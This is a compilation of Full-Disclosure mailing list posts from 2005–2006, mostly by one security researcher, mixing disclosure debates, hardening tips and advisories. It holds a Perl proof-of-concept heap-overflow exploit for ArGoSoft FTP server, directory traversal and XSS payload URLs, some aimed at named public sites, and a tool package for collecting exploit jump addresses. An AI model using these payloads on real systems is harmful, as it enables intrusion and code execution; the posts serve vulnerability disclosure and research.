Gadi Evron a écrit : On Tue, 12 Dec 2006, Joxean Koret wrote: Wow! That's fun! The so called Word 0 day flaw also affects OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool with the file: This is NOT a 0day. It is a disclosed vulnerability in full-disclosure mode, on a mailing list (fuzzing mailing list). I am not sure why I got this 10 times now, I thought the days of these bounces were over. But I am tired of seeing every full-disclosure vulnerability called a 0day anymore. A 0day, whatever definition you use, is used in the wild before people are aware of it. It makes sense and I totally agree with you. But the fact is that the things change (and not allways in the right direction :-()... due to the society, money, research of popularity... Please remember us also the sense of the word hacker for instance, since nowadays it's often use to speak about bad guy/blackhat/pirate - i hope you'll agree that it's not the (our) sense /JA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 is a Source of Problem - Secunia IE7 Release Incident of October 2006
Dear Mi/aster Liu Die Yu, I would like to let you know that i know you and i greatly respect your work. I'm not a security expert, but when i speak about IE vulnerabilities; i speak about Liu Die Yu just as when i speak about oracle vulnerabilities, i speak about *Litchfield when i speak about shatter attacks, i speak about Brett Moore when i speak about games vulnerabilities, i speak about Luigi Auriemma when i speak about web vulnerabilities, i speak about Rgod when i speak about office vulnerabilities, i speak about Class101 i speak also about HD Moore and more guys... it's just as speaking about reggae without speaking about Bob Marley or about how to make money without to speak about Bill Gates (or Dave Aitel) So, for you and these respectable legends: I SALUTE YOU! We all have only one life, and not any time, but legends never die... Thanks /JA * LIUDIEYU dot COM a écrit : Upon IE7 release, Secunia published SA22477 titled `Internet Explorer 7 mhtml: Redirection Information Disclosure`. Here I figured a straightforward demo - navigate IE7 to: * mhtml:http://www.google.com/url?q=http://www.yahoo.com/ Google redirects to Yahoo, Yahoo content is loaded, but browser location is not updated. Microsoft blogs assure vulnerability brought up by Secunia is not in IE7, technically, rather, it's Outlook Express; and as usual, words of Microsoft were well honored by several public media sources. Microsoft do not even send the slightest comment that IE is a source of problem - despite there involves cross-domain data compromise, HTTP redirection, ActiveX(DOM also works) ... all in all, when this attack happens, it got to be IE and no other. Let me sum up: in this case IE is vulnerable, only IE is vulnerable, and Microsoft say These reports are technically inaccurate: the issue concerned in these reports is not in Internet Explorer 7 (or any other version) at all. Upon seeing mhtml:, it reminds of a magnificent historic incident which also involved mhtml: -- an IE exploit so perfectly and widely utilized that it made CERT suggest Use a different web browser(CERT KB VU#323070), and firstly initiated the boom of Firefox. Of course Microsoft is unlikely to say technically this is also not IE's problem. At last allow me to put an off-topic yet sentimental complain ... Quite a while ago, when I got IE exploits and Secunia broadcasted about them, my name was in every news report; This month same situation, codedreamer - original finder of the mhtml: thing broadcasted by Secunia - was not properly given credit ... no mentioning in news reports, no mentioning in the famous first ever IE7 advisory SA22477, codedreamer made the whole thing yet Secunia gave but one single line of credit in bottom of demo The test is based on Proof of Concept code by codedreamer. Let me say I'm a man who believes in paying respect, thus I made this little complain, paying my respect to codedreamer. Best Wishes for All Firefox Surfers and Firefox 2.0 Liu Die Yu 25 OCT 06 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows VML security update MS06-055 released
Juha-Matti Laurio a écrit : It appears that the timestamp of updated Vgx.dll library is 18th September, 2006. so M$ knows timestomp! http://metasploit.com/projects/antiforensics/ :-P ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ExplorerXP : Directory Traversal and Cross Site Scripting
ExplorerXP : Directory Traversal and Cross Site Scripting Software : ExplorerXP Description : Two vulnerabilities have been discovered in ExploreXP, which can be exploited by malicious people to conduct directory traversal and Cross Site Scripting attacks. Directory Traversal : http://[target]/dir.php?chemin=../../../ Cross Site Scripting : http://[target]/dir.php?chemin=../bSilitix Solutions : Edit the source code to ensure that input is properly sanitised. Provided and/or discovered by : Silitix Reference : https://www.securinfos.info/english/security-advisories-alerts/20060329_.ExplorerXP_Directory.Traversal.and.Cross.Site.Scripting.php http://ns79.hosteur.com/~secuti/explorerxp.php (Advisorie in french) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VoIP Security whitepaper : a layered approach
Hi Fred, nice paper btw, what about H.323? Regards /JA https://www.securinfos.info - Original Message - From: Frederic Charpentier [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Thursday, March 23, 2006 3:43 PM Subject: [Full-disclosure] VoIP Security whitepaper : a layered approach Hi FD, Our team is pleased to release a whitepaper about VoIP. This whitepaper propose a security analysis of the Voice Over IP protocols with a layered approach. Link : http://www.xmcopartners.com/whitepapers/voip-security-layered-approach.pdf Chapters : 1 VOICE OVER IP SECURITY 1.1 A GENERAL OVERVIEW OF VOICE OVER IP 1.2 VOICE OVER IP PARTICULARITIES 1.3 VOICE OVER IP ARCHITECTURES 1.4 VOICE OVER IP THREATS 1.4.1 Signaling Protocols Layer 1.4.1.1SIP based Denials of Service 1.4.1.2SIP based Man in the Middle/Call Hijacking 1.4.1.3Possible solutions for SIP based attacks 1.4.2 Transport Protocols Layer 1.4.2.1Eavesdropping 1.4.2.2RTP Insertion attacks 1.4.2.3RTCP insertion attacks 1.4.2.4Possible solutions for RTP based attacks 1.4.3Application Layer 1.5 FUTURE THREATS TO VOICE OVER IP SECURITY 2 CONCLUSIONS -- Xmco Partners Security Consulting / Pentest web : http://www.xmcopartners.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ArGoSoft FTP server remote heap overflow
-- Title:
ArGoSoft FTP server remote heap overflow
-- Affected Products:
ArGoSoft FTP server 1.4.3.5 (current) and prior
-- Affected Vendor:
ArGoSoft - http://www.argosoft.com
-- Impact:
DoS, Arbitrary Code Execution
-- Where:
From remote
-- Type:
Heap Overflow
-- Vulnerability Details:
A remote attacker with valid credentials is able to trigger a heap
overwrite in ArgoSoft FTP server.
The bug occurs by providing a long argument to the DELE command. This
vulnerability can allow remote attackers to execute arbitrary code or
launch a denial of service attack.
-- Credit:
This vulnerability was discovered by Jerome Athias.
https://www.securinfos.info/english/
#!/usr/bin/perl
# #
# ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server #
# Jerome Athias #
# #
use Net::FTP;
# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];
# ===
if (($host) ($port)) {
# make exploit string
$exploit_string = DELE ;
$exploit_string .= A x 2041;
$exploit_string .= B x 4;
$exploit_string .= C x 1026;
#On Win2K SP4 FR:
#EAX 42424241
#ECX 43434343
#EDX 43434342
#EBX 43434B73
# ===
print Trying to connect to $host:$port\n;
$sock = Net::FTP-new($host,Port = $port, TimeOut = 30,
Debug= $debug) or die [-] Connection failed\n;
print [+] Connect OK!\n;
print Logging...\n;
if (!$user) {
$user = test;
$pass = test;
}
$sock-login($user, $pass);
$answer = $sock-message;
print Sending string...\n;
$sock-quot($exploit_string);
} else {
print ArgoSoft FTP Server - PoC
Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port username
password [debug: 1 or 0]\n\n;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
$50,000 for reporting BSA that your neighbor uses an illegal version of Window$ ! https://reporting.bsa.org/usa/home.aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] defeating voice captchas
did someone tried to perform a sound bruteforce attack against something like a voice-password protected PDA? /JA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
Hey guy, do you know something about XSS 1) Phishing? 2) encoded URL, UTF8...? 3) cookie steal? ... it'll not be difficult to reproduce a website and have an url difficult to understand for a basic user... sure it's harder to spoof the url in the browser... // Native.Code a écrit : What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT? Your post is yet another proof that FD is more and more inhibited by scipt kiddies. Get a life! - About FD: Speech is silver, but silence is gold /JA /https://www.securinfos.info/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question for the Windows pros
Applying the Principle of Least Privilege to User Accounts on Windows XP http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/luawinxp.mspx /JA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Someone wasted a nice bug on spyware...
Note that you can register or unregister shimgvw.dll to enable or disable WPFV: - Disable: Start Run regsvr32 /u shimgvw.dll - Enable: Start Run regsvr32 shimgvw.dll You can also use these registry files: https://www.securinfos.info/english/WPFV_disable.reg https://www.securinfos.info/english/WPFV_enable.reg Note: If you unregister shimgvw.dll, Windows Explorer will not display thumbnails anymore. So the registry tweak is a much better way to disable WPFV. If PhotoEd is installed, it will open picture files after WPFV is disabled. /JA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Mozilla Firefox Host: Buffer Overflow
btw Netscape is also affected... smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IIS 5.1 Source Disclosure Under FAT/FAT32 Volumes Using WebDAV
It is possible to remotely view the source code of web script files though a specially crafted WebDAV HTTP request. Only IIS 5.1 seems to be vulnerable. The web script file must be on a FAT or a FAT32 volume, web scripts located on a NTFS are not vulnerable. The information has been provided by Inge Henriksen mailto:inge.henriksen%20at%20booleansoft.com. The original article can be found at: http://ingehenriksen.blogspot.com/2005/09/iis-51-allows-for-remote-viewing-of.html Advisory in french: http://www.athias.fr/alertes-bulletins-securite/20050907_Microsoft.IIS.5.1_Divulgation.de.Sources.html Regards /JA smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multi-Languages OPcodes DB
Hi, as you probably all know, Windows DLLs have different base addresses across Windows/SP/languages so i think it could be usefull to try to build a multi-lang opcodes database, isn't it? so, i have done VERY QUICKLY a little package based on a .BAT and some tools : Files included in the package: * OPCODES_LIST.bat : (horrible) Main batch file MD5: c43d4167f7352c211a97f8cf21cd0458 SHA1: eb2f62912c9311351540dfc0237000e7bf090070 * Psinfo.exe : tool from sysinternals.com to retrieve windows system informations ans the list of installed hotfixs (trying also to use the Windows 2003 wmic qfe command) (could be long...) MD5: 2c18e62e9902b0a258e6a64ab812f02c SHA1: 0188d8836ba6a2a198abcfee9ae730b4ce0521aa pdh.dll MD5: 8542b31187bd1035a2311324c23e66b1 SHA1: ecc77cd54061745273af9750c55c1434c24bcd74 * reg.exe : tool present on XP but not on all 2000... used to retrieve the OS language (languages codes list included in the bat) MD5: 5bc49b61651edbc0a80d2de16d7f422c SHA1: 7a778b97bf7b68247e0b212a81c952118c1ba45a * Findjmp2.exe : tool by Class101 to retrieve the opcodes in memory (DLLs searched : KERNEL32.DLL, NTDLL.DLL, USER32.DLL, SHELL32.DLL, GDI32.DLL, WS2_32.DLL, WS2HELP.DLL) (registers searched : EAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP) MD5: 3909e20cb55ea82b01a3b593d0cc59b6 SHA1: 174169d18b039fcd11ee1507d0a7f8e4230ed717 * LISTDLLS.exe : tool from sysinternals.com used to retrieve the versions of DLLs MD5: bb5f0e1d03f4e32261bb0964fc3b0e9d SHA1: c6081622207ec53f6400a6312a87cf350333996b * mycrc.exe : tool by Luigi Auriemma to check files checksums (MD5, SHA1, ...) MD5: 5473219dd371630c1e7d7e7fa1ddd53f SHA1: 37c71403ed231dd9cb9a6e97c869e7275372ba12 * grep.exe : used to parse a litlle bit the output MD5: 9e05a9c264c8a908a8e79450fcbff047 SHA1: 0ab5c2b1c3c637cbe82564d6d9ed34a78c901cb7 * uniq.exe : used to parse a litlle bit the output PLEASE NOTE : 1) we can do better and more simple!!!, so if you want: JUST DO IT and please don't flame! 2) the output is far to be clean! but could be easily parsed with a simple script... For guy who want to help; please send me the resulting OPCODES_LIST.TXT file (PLEASE REMOVE ALL PERSONNAL DATA IN THE FILE! ;). Then i'll try to check all the files and start to build something, of course publicly available. The package is available for download at: http://www.athias.fr/OPCODES_LIST.RAR MD5: c4a7d4eba31afafb67ef488dda7cf19e SHA1: c99a98741a8365fe6872a2347d0b05891188c584 Please let me know missing things... Thank you. /JA smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: bluetooth devices list ?
http://trifinite.org/trifinite_stuff.html /JA http://www.athias.fr - Alertes et Bulletins de Sécurité - Original Message - From: Mark Sec [EMAIL PROTECTED] To: pen-test@securityfocus.com; full-disclosure@lists.grok.org.uk; security-basics@securityfocus.com Sent: Wednesday, July 27, 2005 9:32 PM Subject: bluetooth devices list ? Alo folks a) has anyone the last list about the vulnerables devices (mobile, devices, etc)under bluetooth ? something linke this: (the section who´s vulnerable) http://www.thebunker.net/security/bluetooth.htm b) has anyone the best mail-lists, tools, links and research about the vulnerabilities about bluetooth? - Mark :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
Hi, you can try: SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\AutoShareServer create a dword called AutoShareServer and set its value to 0 (for a server) OR AutoShareWks=0 (for workstations). Itremoves all $ (hidden) shares EXCEPT IPC$ (need reboot) net share ipc$ /delete (ie in: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run) /JA * http://www.athias.fr - Alertes et bulletins de sécurité - Original Message - From: Ramachandrand To: full-disclosure@lists.grok.org.uk Sent: Thursday, July 28, 2005 9:16 AM Subject: [Full-disclosure] NETBIOS SMB IPC$ unicode share access Hi, AM NEW TO SNORT KINDLY HELP ME In my network all r 2000 XP Pc in that all the users home folder was mapped as \\servername\username$ In server we use to create a folder and give access to the particular user. Recently we I have installed snort in that it keeps on alerting this msg NETBIOS SMB IPC$ unicode share access How to stop this event ie not to detect for this event. plz tell me in brief note Thanks in advance. Regards, D.Ramachandran ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secunia published adviso withoutrespectingrelease date !
2 things i remind myself... 1) http://seclists.org/lists/vulndiscuss/2004/Dec/0006.html 2) This is an answer of Thomas before a disclosure of some vuln that Secunia found at the same time : 10/09/2004 19:40 Re: OpenOffice World-Readable Temporary Files Disclose Files to Local Users Hi Jérôme, This issue was originally discovered by Secunia on 16th August and reported to the vendors. Please do not forward to anyone else. The various vendors well release updates on Wednesday in a co-ordinated disclosure. Kind regards, Thomas On Fri, 2004-09-10 at 17:31, [EMAIL PROTECTED] wrote: Date: Thu, 9 Sep 2004 23:52:18 -0400 Subject: http://www.openoffice.org/issues/show_bug.cgi?id=33357 Reporter: pmladek OS: Linux Version: OOo 1.1.2 Summary: Insecure permissions on temporary files at runtime When OOo is started, a directory /tmp/sv.tmp is created, where RAND is a 3 character random string. The permissions of this directory allow other users (depending on the user's umask) to 'cd' to this directory and list the contents. Once a file is saved, a zipped file is created in /tmp/sv.tmp and the name of the file follows the same convention. The permissions of the file allow others (depending on the user's umask) to read the content. Due to this any user can grab sensitive information of someother user. Steps to reproduce the problem: 1. Launch OpenOffice. 2. List /tmp contents. Locate the directory 'sv*.tmp' 3. Type in some contents in the document and save it. 4. List the contents of the directory /tmp/sv*.tmp/ 5. Do not cl ose OpenOffice. 'su' to a different user. 6. Copy the file under /tmp/sv*.tmp/ to home directory. 7. Use 'unzip' to unzip the files. 8. The file content.xml holds the data the user had just saved. The workaround is to set more secure umask. The problem is that the users does not know about it. Why should they need to set more strict umask if they save its data in a directory which has the correct permissions. They do not expect Regards, Jérôme ATHIAS --- that there are any world-readable temporary data available somewhere on the system. -- Kind regards, Thomas Kristensen CTO Secunia Toldbodgade 37B 1253 Copenhagen K Denmark Tlf.: +45 7020 5144 Fax: +45 7020 5145 So, express your opinion, but either they want exclusivity, either they respect the majority of the time the full-disclosure policy My 0,01€ /JA ** http://www.secunia.fr - Original Message - From: Xavier Beaudouin [EMAIL PROTECTED] To: [EMAIL PROTECTED]@class101.org Cc: full-disclosure@lists.grok.org.uk Sent: Thursday, July 14, 2005 12:59 PM Subject: Re: [Full-disclosure] Secunia published adviso withoutrespectingrelease date ! This is usual with secunia.. I had at bug in a beta version of software and they release a vulnerability to *all* version of this software without even inform the maintainer (me) of this pseudo advisory. My thought with this guys are now : don't even trust them... They push advisory without testing and respect the usual way to inform developper as it should. My 0,02€ /xavier Le 13 juil. 05 à 23:45, [EMAIL PROTECTED] [EMAIL PROTECTED] a écrit : -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Then don't send to Secunia b4 the rls date ! HUH - -Message d'origine- De : [EMAIL PROTECTED] [mailto:full- [EMAIL PROTECTED] De la part de Eric Romang Envoyé : mardi 12 juillet 2005 21:09 À : [EMAIL PROTECTED] Cc : full-disclosure@lists.grok.org.uk; Eric Romang Objet : [Full- disclosure] Secunia published adviso without respectingrelease date ! Hello, This adviso are published on your website, but the patch are not already ok. I have contact upstream today, before you release the adviso, so they could react. As you can see in the adviso, the release date was not given http://secunia.com/advisories/16040/ http://secunia.com/advisories/16040/ http://secunia.com/advisories/16038/ You release adviso without respect the normal process to publish adviso. This guy is monitoring my /adviso/ folder. 80.161.200.182 I think this guy is working for you. So please say to him to respect the normal process in a security process. Regards. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2rc2 (MingW32) iQIVAwUBQtWLU6+LRXunxpxfAQL+1w/+IE947ec5TVHTUox8RC5JCSSAkk+C3GTf wAvkTzYoN7p0LLgFOGmf0oZUQytxQ1QKjgRSv0WeHM3sh/ZX3E33l6z+1aPwLOsO asJDVVYHoxJMTbxccO01dM724UvANPvfO68Y3YHOIcZupJQhzuIqIR8u+clUwwpc M7bToYBMaQbyGKCPuBpVdUqK8DVuXj9Q/+Fz8G+2kvEfM/leGhkOh55AWqcQyyJ0 YMEYFz4pxoR7HnYvMbxh3GLdRda0YhQj12uNw29VacLDmlYJ9JEIp2skfuk/nMM/ CMoVGMHz+HbOhBJTOYoLvqVUcPB9rahXNxgRHas/z8gydFUYzY8IXF5oWlAnw6UQ XrAYR9EvEJaXFO+FqDAoppEnvfv7NNm+dzs5yZCZM1cKel028Zg95sKkzjoAnqZA
Re: [Full-disclosure] Big Sites That Are Vulnerable To XSS
My 2 eurocents:
http://www.multimania.lycos.fr/myaccount/?lsu_ssl=?_loginName=?_loginName=lsu_err_msg=I%20LOVE%20XSS
http://trans.voila.fr/voila?systran_text=%3C/textarea%3E%3CBODY%20ONLOAD=document.write('I_LIKE_XSS!')%3E
Regards.
Jerome
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
